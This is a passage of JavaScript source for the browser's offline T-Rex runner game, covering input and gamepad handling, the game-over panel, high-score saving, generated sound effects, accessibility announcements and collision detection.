   * Process key up.
   * @param {Event} e
   */
  onKeyUp(e) {
    const keyCode = String(e.keyCode);
    const isjumpKey = Runner.keycodes.JUMP[keyCode] ||
        e.type === Runner.events.TOUCHEND || e.type === Runner.events.POINTERUP;

    if (this.isRunning() && isjumpKey) {
      this.tRex.endJump();
    } else if (Runner.keycodes.DUCK[keyCode]) {
      this.tRex.speedDrop = false;
      this.tRex.setDuck(false);
    } else if (this.crashed) {
      // Check that enough time has elapsed before allowing jump key to restart.
      const deltaTime = getTimeStamp() - this.time;

      if (this.isCanvasInView() &&
          (Runner.keycodes.RESTART[keyCode] || this.isLeftClickOnCanvas(e) ||
          (deltaTime >= this.config.GAMEOVER_CLEAR_TIME &&
          Runner.keycodes.JUMP[keyCode]))) {
        this.handleGameOverClicks(e);
      }
    } else if (this.paused && isjumpKey) {
      // Reset the jump state
      this.tRex.reset();
      this.play();
    }
  },

  /**
   * Process gamepad connected event.
   * @param {Event} e
   */
  onGamepadConnected(e) {
    if (!this.pollingGamepads) {
      this.pollGamepadState();
    }
  },

  /**
   * rAF loop for gamepad polling.
   */
  pollGamepadState() {
    const gamepads = navigator.getGamepads();
    this.pollActiveGamepad(gamepads);

    this.pollingGamepads = true;
    requestAnimationFrame(this.pollGamepadState.bind(this));
  },

  /**
   * Polls for a gamepad with the jump button pressed. If one is found this
   * becomes the "active" gamepad and all others are ignored.
   * @param {!Array<Gamepad>} gamepads
   */
  pollForActiveGamepad(gamepads) {
    for (let i = 0; i < gamepads.length; ++i) {
      if (gamepads[i] && gamepads[i].buttons.length > 0 &&
          gamepads[i].buttons[0].pressed) {
        this.gamepadIndex = i;
        this.pollActiveGamepad(gamepads);
        return;
      }
    }
  },

  /**
   * Polls the chosen gamepad for button presses and generates KeyboardEvents
   * to integrate with the rest of the game logic.
   * @param {!Array<Gamepad>} gamepads
   */
  pollActiveGamepad(gamepads) {
    if (this.gamepadIndex === undefined) {
      this.pollForActiveGamepad(gamepads);
      return;
    }

    const gamepad = gamepads[this.gamepadIndex];
    if (!gamepad) {
      this.gamepadIndex = undefined;
      this.pollForActiveGamepad(gamepads);
      return;
    }

    // The gamepad specification defines the typical mapping of physical buttons
    // to button indicies: https://w3c.github.io/gamepad/#remapping
    this.pollGamepadButton(gamepad, 0, 38);  // Jump
    if (gamepad.buttons.length >= 2) {
      this.pollGamepadButton(gamepad, 1, 40);  // Duck
    }
    if (gamepad.buttons.length >= 10) {
      this.pollGamepadButton(gamepad, 9, 13);  // Restart
    }

    this.previousGamepad = gamepad;
  },

  /**
   * Generates a key event based on a gamepad button.
   * @param {!Gamepad} gamepad
   * @param {number} buttonIndex
   * @param {number} keyCode
   */
  pollGamepadButton(gamepad, buttonIndex, keyCode) {
    const state = gamepad.buttons[buttonIndex].pressed;
    let previousState = false;
    if (this.previousGamepad) {
      previousState = this.previousGamepad.buttons[buttonIndex].pressed;
    }
    // Generate key events on the rising and falling edge of a button press.
    if (state !== previousState) {
      const e = new KeyboardEvent(state ? Runner.events.KEYDOWN
                                      : Runner.events.KEYUP,
                                { keyCode: keyCode });
      document.dispatchEvent(e);
    }
  },

  /**
   * Handle interactions on the game over screen state.
   * A user is able to tap the high score twice to reset it.
   * @param {Event} e
   */
  handleGameOverClicks(e) {
    if (e.target != this.slowSpeedCheckbox) {
      e.preventDefault();
      if (this.distanceMeter.hasClickedOnHighScore(e) && this.highestScore) {
        if (this.distanceMeter.isHighScoreFlashing()) {
          // Subsequent click, reset the high score.
          this.saveHighScore(0, true);
          this.distanceMeter.resetHighScore();
        } else {
          // First click, flash the high score.
          this.distanceMeter.startHighScoreFlashing();
        }
      } else {
        this.distanceMeter.cancelHighScoreFlashing();
        this.restart();
      }
    }
  },

  /**
   * Returns whether the event was a left click on canvas.
   * On Windows right click is registered as a click.
   * @param {Event} e
   * @return {boolean}
   */
  isLeftClickOnCanvas(e) {
    return e.button != null && e.button < 2 &&
        e.type === Runner.events.POINTERUP &&
        (e.target === this.canvas ||
         (IS_MOBILE && Runner.audioCues && e.target === this.containerEl));
  },

  /**
   * RequestAnimationFrame wrapper.
   */
  scheduleNextUpdate() {
    if (!this.updatePending) {
      this.updatePending = true;
      this.raqId = requestAnimationFrame(this.update.bind(this));
    }
  },

  /**
   * Whether the game is running.
   * @return {boolean}
   */
  isRunning() {
    return !!this.raqId;
  },

  /**
   * Set the initial high score as stored in the user's profile.
   * @param {number} highScore
   */
  initializeHighScore(highScore) {
    this.syncHighestScore = true;
    highScore = Math.ceil(highScore);
    if (highScore < this.highestScore) {
      if (window.errorPageController) {
        errorPageController.updateEasterEggHighScore(this.highestScore);
      }
      return;
    }
    this.highestScore = highScore;
    this.distanceMeter.setHighScore(this.highestScore);
  },

  /**
   * Sets the current high score and saves to the profile if available.
   * @param {number} distanceRan Total distance ran.
   * @param {boolean=} opt_resetScore Whether to reset the score.
   */
  saveHighScore(distanceRan, opt_resetScore) {
    this.highestScore = Math.ceil(distanceRan);
    this.distanceMeter.setHighScore(this.highestScore);

    // Store the new high score in the profile.
    if (this.syncHighestScore && window.errorPageController) {
      if (opt_resetScore) {
        errorPageController.resetEasterEggHighScore();
      } else {
        errorPageController.updateEasterEggHighScore(this.highestScore);
      }
    }
  },

  /**
   * Game over state.
   */
  gameOver() {
    this.playSound(this.soundFx.HIT);
    vibrate(200);

    this.stop();
    this.crashed = true;
    this.distanceMeter.achievement = false;

    this.tRex.update(100, Trex.status.CRASHED);

    // Game over panel.
    if (!this.gameOverPanel) {
      const origSpriteDef = IS_HIDPI ?
          Runner.spriteDefinitionByType.original.HDPI :
          Runner.spriteDefinitionByType.original.LDPI;

      if (this.canvas) {
        if (Runner.isAltGameModeEnabled) {
          this.gameOverPanel = new GameOverPanel(
              this.canvas, origSpriteDef.TEXT_SPRITE, origSpriteDef.RESTART,
              this.dimensions, origSpriteDef.ALT_GAME_END,
              this.altGameModeActive);
        } else {
          this.gameOverPanel = new GameOverPanel(
              this.canvas, origSpriteDef.TEXT_SPRITE, origSpriteDef.RESTART,
              this.dimensions);
        }
      }
    }

    this.gameOverPanel.draw(this.altGameModeActive, this.tRex);

    // Update the high score.
    if (this.distanceRan > this.highestScore) {
      this.saveHighScore(this.distanceRan);
    }

    // Reset the time clock.
    this.time = getTimeStamp();

    if (Runner.audioCues) {
      this.generatedSoundFx.stopAll();
      announcePhrase(
          getA11yString(A11Y_STRINGS.gameOver)
              .replace(
                  '$1',
                  this.distanceMeter.getActualDistance(this.distanceRan)
                      .toString()) +
          ' ' +
          getA11yString(A11Y_STRINGS.highScore)
              .replace(
                  '$1',

                  this.distanceMeter.getActualDistance(this.highestScore)
                      .toString()));
      this.containerEl.setAttribute(
          'title', getA11yString(A11Y_STRINGS.ariaLabel));
    }
    this.showSpeedToggle();
    this.disableSpeedToggle(false);
  },

  stop() {
    this.setPlayStatus(false);
    this.paused = true;
    cancelAnimationFrame(this.raqId);
    this.raqId = 0;
    this.generatedSoundFx.stopAll();
  },

  play() {
    if (!this.crashed) {
      this.setPlayStatus(true);
      this.paused = false;
      this.tRex.update(0, Trex.status.RUNNING);
      this.time = getTimeStamp();
      this.update();
      this.generatedSoundFx.background();
    }
  },

  restart() {
    if (!this.raqId) {
      this.playCount++;
      this.runningTime = 0;
      this.setPlayStatus(true);
      this.toggleSpeed();
      this.paused = false;
      this.crashed = false;
      this.distanceRan = 0;
      this.setSpeed(this.config.SPEED);
      this.time = getTimeStamp();
      this.containerEl.classList.remove(Runner.classes.CRASHED);
      this.clearCanvas();
      this.distanceMeter.reset();
      this.horizon.reset();
      this.tRex.reset();
      this.playSound(this.soundFx.BUTTON_PRESS);
      this.invert(true);
      this.flashTimer = null;
      this.update();
      this.gameOverPanel.reset();
      this.generatedSoundFx.background();
      this.containerEl.setAttribute('title', getA11yString(A11Y_STRINGS.jump));
      announcePhrase(getA11yString(A11Y_STRINGS.started));
    }
  },

  setPlayStatus(isPlaying) {
    if (this.touchController) {
      this.touchController.classList.toggle(HIDDEN_CLASS, !isPlaying);
    }
    this.playing = isPlaying;
  },

  /**
   * Whether the game should go into arcade mode.
   * @return {boolean}
   */
  isArcadeMode() {
    // In RTL languages the title is wrapped with the left to right mark
    // control characters &#x202A; and &#x202C but are invisible.
    return IS_RTL ? document.title.indexOf(ARCADE_MODE_URL) == 1 :
                    document.title === ARCADE_MODE_URL;
  },

  /**
   * Hides offline messaging for a fullscreen game only experience.
   */
  setArcadeMode() {
    document.body.classList.add(Runner.classes.ARCADE_MODE);
    this.setArcadeModeContainerScale();
  },

  /**
   * Sets the scaling for arcade mode.
   */
  setArcadeModeContainerScale() {
    const windowHeight = window.innerHeight;
    const scaleHeight = windowHeight / this.dimensions.HEIGHT;
    const scaleWidth = window.innerWidth / this.dimensions.WIDTH;
    const scale = Math.max(1, Math.min(scaleHeight, scaleWidth));
    const scaledCanvasHeight = this.dimensions.HEIGHT * scale;
    // Positions the game container at 10% of the available vertical window
    // height minus the game container height.
    const translateY = Math.ceil(Math.max(0, (windowHeight - scaledCanvasHeight -
        Runner.config.ARCADE_MODE_INITIAL_TOP_POSITION) *
        Runner.config.ARCADE_MODE_TOP_POSITION_PERCENT)) *
        window.devicePixelRatio;

    const cssScale = IS_RTL ? -scale + ',' + scale : scale;
    this.containerEl.style.transform =
        'scale(' + cssScale + ') translateY(' + translateY + 'px)';
  },

  /**
   * Pause the game if the tab is not in focus.
   */
  onVisibilityChange(e) {
    if (document.hidden || document.webkitHidden || e.type === 'blur' ||
        document.visibilityState !== 'visible') {
      this.stop();
    } else if (!this.crashed) {
      this.tRex.reset();
      this.play();
    }
  },

  /**
   * Play a sound.
   * @param {AudioBuffer} soundBuffer
   */
  playSound(soundBuffer) {
    if (soundBuffer) {
      const sourceNode = this.audioContext.createBufferSource();
      sourceNode.buffer = soundBuffer;
      sourceNode.connect(this.audioContext.destination);
      sourceNode.start(0);
    }
  },

  /**
   * Inverts the current page / canvas colors.
   * @param {boolean} reset Whether to reset colors.
   */
  invert(reset) {
    const htmlEl = document.firstElementChild;

    if (reset) {
      htmlEl.classList.toggle(Runner.classes.INVERTED,
          false);
      this.invertTimer = 0;
      this.inverted = false;
    } else {
      this.inverted = htmlEl.classList.toggle(
          Runner.classes.INVERTED, this.invertTrigger);
    }
  },
};


/**
 * Updates the canvas size taking into
 * account the backing store pixel ratio and
 * the device pixel ratio.
 *
 * See article by Paul Lewis:
 * http://www.html5rocks.com/en/tutorials/canvas/hidpi/
 *
 * @param {HTMLCanvasElement} canvas
 * @param {number=} opt_width
 * @param {number=} opt_height
 * @return {boolean} Whether the canvas was scaled.
 */
Runner.updateCanvasScaling = function(canvas, opt_width, opt_height) {
  const context =
      /** @type {CanvasRenderingContext2D} */ (canvas.getContext('2d'));

  // Query the various pixel ratios
  const devicePixelRatio = Math.floor(window.devicePixelRatio) || 1;
  /** @suppress {missingProperties} */
  const backingStoreRatio =
      Math.floor(context.webkitBackingStorePixelRatio) || 1;
  const ratio = devicePixelRatio / backingStoreRatio;

  // Upscale the canvas if the two ratios don't match
  if (devicePixelRatio !== backingStoreRatio) {
    const oldWidth = opt_width || canvas.width;
    const oldHeight = opt_height || canvas.height;

    canvas.width = oldWidth * ratio;
    canvas.height = oldHeight * ratio;

    canvas.style.width = oldWidth + 'px';
    canvas.style.height = oldHeight + 'px';

    // Scale the context to counter the fact that we've manually scaled
    // our canvas element.
    context.scale(ratio, ratio);
    return true;
  } else if (devicePixelRatio === 1) {
    // Reset the canvas width / height. Fixes scaling bug when the page is
    // zoomed and the devicePixelRatio changes accordingly.
    canvas.style.width = canvas.width + 'px';
    canvas.style.height = canvas.height + 'px';
  }
  return false;
};


/**
 * Whether events are enabled.
 * @return {boolean}
 */
Runner.isAltGameModeEnabled = function() {
  return loadTimeData && loadTimeData.valueExists('enableAltGameMode');
};


/**
 * Generated sound FX class for audio cues.
 * @constructor
 */
function GeneratedSoundFx() {
  this.audioCues = false;
  this.context = null;
  this.panner = null;
}

GeneratedSoundFx.prototype = {
  init() {
    this.audioCues = true;
    if (!this.context) {
      // iOS only supports the webkit version.
      this.context = window.webkitAudioContext ? new webkitAudioContext() :
                                                 new AudioContext();
      if (IS_IOS) {
        this.context.onstatechange = (function() {
                                       if (this.context.state != 'running') {
                                         this.context.resume();
                                       }
                                     }).bind(this);
        this.context.resume();
      }
      this.panner = this.context.createStereoPanner ?
          this.context.createStereoPanner() :
          null;
    }
  },

  stopAll() {
    this.cancelFootSteps();
  },

  /**
   * Play oscillators at certain frequency and for a certain time.
   * @param {number} frequency
   * @param {number} startTime
   * @param {number} duration
   * @param {?number=} opt_vol
   * @param {number=} opt_pan
   */
  playNote(frequency, startTime, duration, opt_vol, opt_pan) {
    const osc1 = this.context.createOscillator();
    const osc2 = this.context.createOscillator();
    const volume = this.context.createGain();

    // Set oscillator wave type
    osc1.type = 'triangle';
    osc2.type = 'triangle';
    volume.gain.value = 0.1;

    // Set up node routing
    if (this.panner) {
      this.panner.pan.value = opt_pan || 0;
      osc1.connect(volume).connect(this.panner);
      osc2.connect(volume).connect(this.panner);
      this.panner.connect(this.context.destination);
    } else {
      osc1.connect(volume);
      osc2.connect(volume);
      volume.connect(this.context.destination);
    }

    // Detune oscillators for chorus effect
    osc1.frequency.value = frequency + 1;
    osc2.frequency.value = frequency - 2;

    // Fade out
    volume.gain.setValueAtTime(opt_vol || 0.01, startTime + duration - 0.05);
    volume.gain.linearRampToValueAtTime(0.00001, startTime + duration);

    // Start oscillators
    osc1.start(startTime);
    osc2.start(startTime);
    // Stop oscillators
    osc1.stop(startTime + duration);
    osc2.stop(startTime + duration);
  },

  background() {
    if (this.audioCues) {
      const now = this.context.currentTime;
      this.playNote(493.883, now, 0.116);
      this.playNote(659.255, now + 0.116, 0.232);
      this.loopFootSteps();
    }
  },

  loopFootSteps() {
    if (this.audioCues && !this.bgSoundIntervalId) {
      this.bgSoundIntervalId = setInterval(function() {
        this.playNote(73.42, this.context.currentTime, 0.05, 0.16);
        this.playNote(69.30, this.context.currentTime + 0.116, 0.116, 0.16);
      }.bind(this), 280);
    }
  },

  cancelFootSteps() {
    if (this.audioCues && this.bgSoundIntervalId) {
      clearInterval(this.bgSoundIntervalId);
      this.bgSoundIntervalId = null;
      this.playNote(103.83, this.context.currentTime, 0.232, 0.02);
      this.playNote(116.54, this.context.currentTime + 0.116, 0.232, 0.02);
    }
  },

  collect() {
    if (this.audioCues) {
      this.cancelFootSteps();
      const now = this.context.currentTime;
      this.playNote(830.61, now, 0.116);
      this.playNote(1318.51, now + 0.116, 0.232);
    }
  },

  jump() {
    if (this.audioCues) {
      const now = this.context.currentTime;
      this.playNote(659.25, now, 0.116, 0.3, -0.6);
      this.playNote(880, now + 0.116, 0.232, 0.3, -0.6);
    }
  },
};


/**
 * Speak a phrase using Speech Synthesis API for a11y.
 * @param {string} phrase Sentence to speak.
 */
function speakPhrase(phrase) {
  if ('speechSynthesis' in window) {
    const msg = new SpeechSynthesisUtterance(phrase);
    const voices = window.speechSynthesis.getVoices();
    msg.text = phrase;
    speechSynthesis.speak(msg);
  }
}


/**
 * For screen readers make an announcement to the live region.
 * @param {string} phrase Sentence to speak.
 */
function announcePhrase(phrase) {
  if (Runner.a11yStatusEl) {
    Runner.a11yStatusEl.textContent = '';
    Runner.a11yStatusEl.textContent = phrase;
  }
}


/**
 * Returns a string from loadTimeData data object.
 * @param {string} stringName
 * @return {string}
 */
function getA11yString(stringName) {
  return loadTimeData && loadTimeData.valueExists(stringName) ?
      loadTimeData.getString(stringName) :
      '';
}


/**
 * Get random number.
 * @param {number} min
 * @param {number} max
 */
function getRandomNum(min, max) {
  return Math.floor(Math.random() * (max - min + 1)) + min;
}


/**
 * Vibrate on mobile devices.
 * @param {number} duration Duration of the vibration in milliseconds.
 */
function vibrate(duration) {
  if (IS_MOBILE && window.navigator.vibrate) {
    window.navigator.vibrate(duration);
  }
}


/**
 * Create canvas element.
 * @param {Element} container Element to append canvas to.
 * @param {number} width
 * @param {number} height
 * @param {string=} opt_classname
 * @return {HTMLCanvasElement}
 */
function createCanvas(container, width, height, opt_classname) {
  const canvas =
      /** @type {!HTMLCanvasElement} */ (document.createElement('canvas'));
  canvas.className = opt_classname ? Runner.classes.CANVAS + ' ' +
      opt_classname : Runner.classes.CANVAS;
  canvas.width = width;
  canvas.height = height;
  container.appendChild(canvas);

  return canvas;
}


/**
 * Decodes the base 64 audio to ArrayBuffer used by Web Audio.
 * @param {string} base64String
 */
function decodeBase64ToArrayBuffer(base64String) {
  const len = (base64String.length / 4) * 3;
  const str = atob(base64String);
  const arrayBuffer = new ArrayBuffer(len);
  const bytes = new Uint8Array(arrayBuffer);

  for (let i = 0; i < len; i++) {
    bytes[i] = str.charCodeAt(i);
  }
  return bytes.buffer;
}


/**
 * Return the current timestamp.
 * @return {number}
 */
function getTimeStamp() {
  return IS_IOS ? new Date().getTime() : performance.now();
}


//******************************************************************************


/**
 * Game over panel.
 * @param {!HTMLCanvasElement} canvas
 * @param {Object} textImgPos
 * @param {Object} restartImgPos
 * @param {!Object} dimensions Canvas dimensions.
 * @param {Object=} opt_altGameEndImgPos
 * @param {boolean=} opt_altGameActive
 * @constructor
 */
function GameOverPanel(
    canvas, textImgPos, restartImgPos, dimensions, opt_altGameEndImgPos,
    opt_altGameActive) {
  this.canvas = canvas;
  this.canvasCtx =
      /** @type {CanvasRenderingContext2D} */ (canvas.getContext('2d'));
  this.canvasDimensions = dimensions;
  this.textImgPos = textImgPos;
  this.restartImgPos = restartImgPos;
  this.altGameEndImgPos = opt_altGameEndImgPos;
  this.altGameModeActive = opt_altGameActive;

  // Retry animation.
  this.frameTimeStamp = 0;
  this.animTimer = 0;
  this.currentFrame = 0;

  this.gameOverRafId = null;

  this.flashTimer = 0;
  this.flashCounter = 0;
  this.originalText = true;
}

GameOverPanel.RESTART_ANIM_DURATION = 875;
GameOverPanel.LOGO_PAUSE_DURATION = 875;
GameOverPanel.FLASH_ITERATIONS = 5;

/**
 * Animation frames spec.
 */
GameOverPanel.animConfig = {
  frames: [0, 36, 72, 108, 144, 180, 216, 252],
  msPerFrame: GameOverPanel.RESTART_ANIM_DURATION / 8,
};

/**
 * Dimensions used in the panel.
 * @enum {number}
 */
GameOverPanel.dimensions = {
  TEXT_X: 0,
  TEXT_Y: 13,
  TEXT_WIDTH: 191,
  TEXT_HEIGHT: 11,
  RESTART_WIDTH: 36,
  RESTART_HEIGHT: 32,
};


GameOverPanel.prototype = {
  /**
   * Update the panel dimensions.
   * @param {number} width New canvas width.
   * @param {number} opt_height Optional new canvas height.
   */
  updateDimensions(width, opt_height) {
    this.canvasDimensions.WIDTH = width;
    if (opt_height) {
      this.canvasDimensions.HEIGHT = opt_height;
    }
    this.currentFrame = GameOverPanel.animConfig.frames.length - 1;
  },

  drawGameOverText(dimensions, opt_useAltText) {
    const centerX = this.canvasDimensions.WIDTH / 2;
    let textSourceX = dimensions.TEXT_X;
    let textSourceY = dimensions.TEXT_Y;
    let textSourceWidth = dimensions.TEXT_WIDTH;
    let textSourceHeight = dimensions.TEXT_HEIGHT;

    const textTargetX = Math.round(centerX - (dimensions.TEXT_WIDTH / 2));
    const textTargetY = Math.round((this.canvasDimensions.HEIGHT - 25) / 3);
    const textTargetWidth = dimensions.TEXT_WIDTH;
    const textTargetHeight = dimensions.TEXT_HEIGHT;

    if (IS_HIDPI) {
      textSourceY *= 2;
      textSourceX *= 2;
      textSourceWidth *= 2;
      textSourceHeight *= 2;
    }

    if (!opt_useAltText) {
      textSourceX += this.textImgPos.x;
      textSourceY += this.textImgPos.y;
    }

    const spriteSource =
        opt_useAltText ? Runner.altCommonImageSprite : Runner.origImageSprite;

    this.canvasCtx.save();

    if (IS_RTL) {
      this.canvasCtx.translate(this.canvasDimensions.WIDTH, 0);
      this.canvasCtx.scale(-1, 1);
    }

    // Game over text from sprite.
    this.canvasCtx.drawImage(
        spriteSource, textSourceX, textSourceY, textSourceWidth,
        textSourceHeight, textTargetX, textTargetY, textTargetWidth,
        textTargetHeight);

    this.canvasCtx.restore();
  },

  /**
   * Draw additional adornments for alternative game types.
   */
  drawAltGameElements(tRex) {
    // Additional adornments.
    if (this.altGameModeActive && Runner.spriteDefinition.ALT_GAME_END_CONFIG) {
      const altGameEndConfig = Runner.spriteDefinition.ALT_GAME_END_CONFIG;

      let altGameEndSourceWidth = altGameEndConfig.WIDTH;
      let altGameEndSourceHeight = altGameEndConfig.HEIGHT;
      const altGameEndTargetX = tRex.xPos + altGameEndConfig.X_OFFSET;
      const altGameEndTargetY = tRex.yPos + altGameEndConfig.Y_OFFSET;

      if (IS_HIDPI) {
        altGameEndSourceWidth *= 2;
        altGameEndSourceHeight *= 2;
      }

      this.canvasCtx.drawImage(
          Runner.altCommonImageSprite, this.altGameEndImgPos.x,
          this.altGameEndImgPos.y, altGameEndSourceWidth,
          altGameEndSourceHeight, altGameEndTargetX, altGameEndTargetY,
          altGameEndConfig.WIDTH, altGameEndConfig.HEIGHT);
    }
  },

  /**
   * Draw restart button.
   */
  drawRestartButton() {
    const dimensions = GameOverPanel.dimensions;
    let framePosX = GameOverPanel.animConfig.frames[this.currentFrame];
    let restartSourceWidth = dimensions.RESTART_WIDTH;
    let restartSourceHeight = dimensions.RESTART_HEIGHT;
    const restartTargetX =
        (this.canvasDimensions.WIDTH / 2) - (dimensions.RESTART_WIDTH / 2);
    const restartTargetY = this.canvasDimensions.HEIGHT / 2;

    if (IS_HIDPI) {
      restartSourceWidth *= 2;
      restartSourceHeight *= 2;
      framePosX *= 2;
    }

    this.canvasCtx.save();

    if (IS_RTL) {
      this.canvasCtx.translate(this.canvasDimensions.WIDTH, 0);
      this.canvasCtx.scale(-1, 1);
    }

    this.canvasCtx.drawImage(
        Runner.origImageSprite, this.restartImgPos.x + framePosX,
        this.restartImgPos.y, restartSourceWidth, restartSourceHeight,
        restartTargetX, restartTargetY, dimensions.RESTART_WIDTH,
        dimensions.RESTART_HEIGHT);
    this.canvasCtx.restore();
  },


  /**
   * Draw the panel.
   * @param {boolean} opt_altGameModeActive
   * @param {!Trex} opt_tRex
   */
  draw(opt_altGameModeActive, opt_tRex) {
    if (opt_altGameModeActive) {
      this.altGameModeActive = opt_altGameModeActive;
    }

    this.drawGameOverText(GameOverPanel.dimensions, false);
    this.drawRestartButton();
    this.drawAltGameElements(opt_tRex);
    this.update();
  },

  /**
   * Update animation frames.
   */
  update() {
    const now = getTimeStamp();
    const deltaTime = now - (this.frameTimeStamp || now);

    this.frameTimeStamp = now;
    this.animTimer += deltaTime;
    this.flashTimer += deltaTime;

    // Restart Button
    if (this.currentFrame == 0 &&
        this.animTimer > GameOverPanel.LOGO_PAUSE_DURATION) {
      this.animTimer = 0;
      this.currentFrame++;
      this.drawRestartButton();
    } else if (
        this.currentFrame > 0 &&
        this.currentFrame < GameOverPanel.animConfig.frames.length) {
      if (this.animTimer >= GameOverPanel.animConfig.msPerFrame) {
        this.currentFrame++;
        this.drawRestartButton();
      }
    } else if (
        !this.altGameModeActive &&
        this.currentFrame == GameOverPanel.animConfig.frames.length) {
      this.reset();
      return;
    }

    // Game over text
    if (this.altGameModeActive &&
        Runner.spriteDefinitionByType.original.ALT_GAME_OVER_TEXT_CONFIG) {
      const altTextConfig =
          Runner.spriteDefinitionByType.original.ALT_GAME_OVER_TEXT_CONFIG;

      if (this.flashCounter < GameOverPanel.FLASH_ITERATIONS &&
          this.flashTimer > altTextConfig.FLASH_DURATION) {
        this.flashTimer = 0;
        this.originalText = !this.originalText;

        this.clearGameOverTextBounds();
        if (this.originalText) {
          this.drawGameOverText(GameOverPanel.dimensions, false);
          this.flashCounter++;
        } else {
          this.drawGameOverText(altTextConfig, true);
        }
      } else if (this.flashCounter >= GameOverPanel.FLASH_ITERATIONS) {
        this.reset();
        return;
      }
    }

    this.gameOverRafId = requestAnimationFrame(this.update.bind(this));
  },

  /**
   * Clear game over text.
   */
  clearGameOverTextBounds() {
    this.canvasCtx.save();

    this.canvasCtx.clearRect(
        Math.round(
            this.canvasDimensions.WIDTH / 2 -
            (GameOverPanel.dimensions.TEXT_WIDTH / 2)),
        Math.round((this.canvasDimensions.HEIGHT - 25) / 3),
        GameOverPanel.dimensions.TEXT_WIDTH,
        GameOverPanel.dimensions.TEXT_HEIGHT + 4);
    this.canvasCtx.restore();
  },

  reset() {
    if (this.gameOverRafId) {
      cancelAnimationFrame(this.gameOverRafId);
      this.gameOverRafId = null;
    }
    this.animTimer = 0;
    this.frameTimeStamp = 0;
    this.currentFrame = 0;
    this.flashTimer = 0;
    this.flashCounter = 0;
    this.originalText = true;
  },
};


//******************************************************************************

/**
 * Check for a collision.
 * @param {!Obstacle} obstacle
 * @param {!Trex} tRex T-rex object.
 * @param {CanvasRenderingContext2D=} opt_canvasCtx Optional canvas context for
 *    drawing collision boxes.
 * @return {Array<CollisionBox>|undefined}
 */
function checkForCollision(obstacle, tRex, opt_canvasCtx) {
  const obstacleBoxXPos = Runner.defaultDimensions.WIDTH + obstacle.xPos;

  // Adjustments are made to the bounding box as there is a 1 pixel white
  // border around the t-rex and obstacles.
  const tRexBox = new CollisionBox(
      tRex.xPos + 1,
      tRex.yPos + 1,
      tRex.config.WIDTH - 2,
      tRex.config.HEIGHT - 2);

  const obstacleBox = new CollisionBox(
      obstacle.xPos + 1,
      obstacle.yPos + 1,
      obstacle.typeConfig.width * obstacle.size - 2,
      obstacle.typeConfig.height - 2);

  // Debug outer box
  if (opt_canvasCtx) {
    drawCollisionBoxes(opt_canvasCtx, tRexBox, obstacleBox);
  }

  // Simple outer bounds check.
  if (boxCompare(tRexBox, obstacleBox)) {
    const collisionBoxes = obstacle.collisionBoxes;
    let tRexCollisionBoxes = [];

    if (Runner.isAltGameModeEnabled()) {
      tRexCollisionBoxes = Runner.spriteDefinition.TREX.COLLISION_BOXES;
    } else {
      tRexCollisionBoxes = tRex.ducking ? Trex.collisionBoxes.DUCKING :
                                          Trex.collisionBoxes.RUNNING;
    }

    // Detailed axis aligned box check.
    for (let t = 0; t < tRexCollisionBoxes.length; t++) {
      for (let i = 0; i < collisionBoxes.length; i++) {
        // Adjust the box to actual positions.
        const adjTrexBox =
            createAdjustedCollisionBox(tRexCollisionBoxes[t], tRexBox);
        const adjObstacleBox =
            createAdjustedCollisionBox(collisionBoxes[i], obstacleBox);
        const crashed = boxCompare(adjTrexBox, adjObstacleBox);

        // Draw boxes for debug.
        if (opt_canvasCtx) {
          drawCollisionBoxes(opt_canvasCtx, adjTrexBox, adjObstacleBox);
        }

        if (crashed) {
          return [adjTrexBox, adjObstacleBox];
        }
      }
    }
  }
}


/**
 * Adjust the collision box.
 * @param {!CollisionBox} box The original box.
 * @param {!CollisionBox} adjustment Adjustment box.
 * @return {CollisionBox} The adjusted collision box object.
 */
function createAdjustedCollisionBox(box, adjustment) {
  return new CollisionBox(
      box.x + adjustment.x,
      box.y + adjustment.y,
      box.width,
      box.height);
}


/**
 * Draw the collision boxes for debug.
 */
function drawCollisionBoxes(canvasCtx, tRexBox, obstacleBox) {
  canvasCtx.save();
  canvasCtx.strokeStyle = '#f00';
  canvasCtx.strokeRect(tRexBox.x, tRexBox.y, tRexBox.width, tRexBox.height);

  canvasCtx.strokeStyle = '#0f0';
  canvasCtx.strokeRect(obstacleBox.x, obstacleBox.y,
      obstacleBox.width, obstacleBox.height);
  canvasCtx.restore();
}


/**
 * Compare two collision boxes for a collision.
 * @param {CollisionBox} tRexBox
 * @param {CollisionBox} obstacleBox
 * @return {boolean} Whether the boxes intersected.
 */
function boxCompare(tRexBox, obstacleBox) {
  let crashed = false;
  const tRexBoxX = tRexBox.x;
  const tRexBoxY = tRexBox.y;

  const obstacleBoxX = obstacleBox.x;
  const obstacleBoxY = obstacleBox.y;

  // Axis-Aligned Bounding Box method.
  if (tRexBox.x < obstacleBoxX + obstacleBox.width &&
      tRexBox.x + tRexBox.width > obstacleBoxX &&
      tRexBox.y < obstacleBox.y + obstacleBox.height &&
      tRexBox.height + tRexBox.y > obstacleBox.y) {
    crashed = true;
  }

  return crashed;
}


//******************************************************************************

/**
 * Collision box object.
 * @param {number} x X position.
 * @param {number} y Y Position.
 * @param {number} w Width.
 * @param {number} h Height.
 * @constructor
 */
function CollisionBox(x, y, w, h) {
  this.x = x;
  this.y = y;
  this.width = w;
  this.height = h;
}


//******************************************************************************

/**
 * Obstacle.
 * @param {CanvasRenderingContext2D} canvasCtx
 * @param {ObstacleType} type
 * @param {Object} spriteImgPos Obstacle position in sprite.
 * @param {Object} dimensions
 * @param {number} gapCoefficient Mutipler in determining the gap.
 * @param {number} speed
 * @param {number=} opt_xOffset
 * @param {boolean=} opt_isAltGameMode
 * @constructor
 */
function Obstacle(
    canvasCtx, type, spriteImgPos, dimensions, gapCoefficient, speed,
    opt_xOffset, opt_isAltGameMode) {
  this.canvasCtx = canvasCtx;
  this.spritePos = spriteImgPos;
  this.typeConfig = type;
  this.gapCoefficient = Runner.slowDown ? gapCoefficient * 2 : gapCoefficient;
  this.size = getRandomNum(1, Obstacle.MAX_OBSTACLE_LENGTH);
  this.dimensions = dimensions;
  this.remove = false;
  this.xPos = dimensions.WIDTH + (opt_xOffset || 0);
  this.yPos = 0;
  this.width = 0;
  this.collisionBoxes = [];
  this.gap = 0;
  this.speedOffset = 0;
  this.altGameModeActive = opt_isAltGameMode;
  this.imageSprite = this.typeConfig.type == 'COLLECTABLE' ?
      Runner.altCommonImageSprite :
      this.altGameModeActive ? Runner.altGameImageSprite : Runner.imageSprite;

  // For animated obstacles.
  this.currentFrame = 0;
  this.timer = 0;

  this.init(speed);
}

/**
 * Coefficient for calculating the maximum gap.
 */
Obstacle.MAX_GAP_COEFFICIENT = 1.5;

/**
 * Maximum obstacle grouping count.
 */
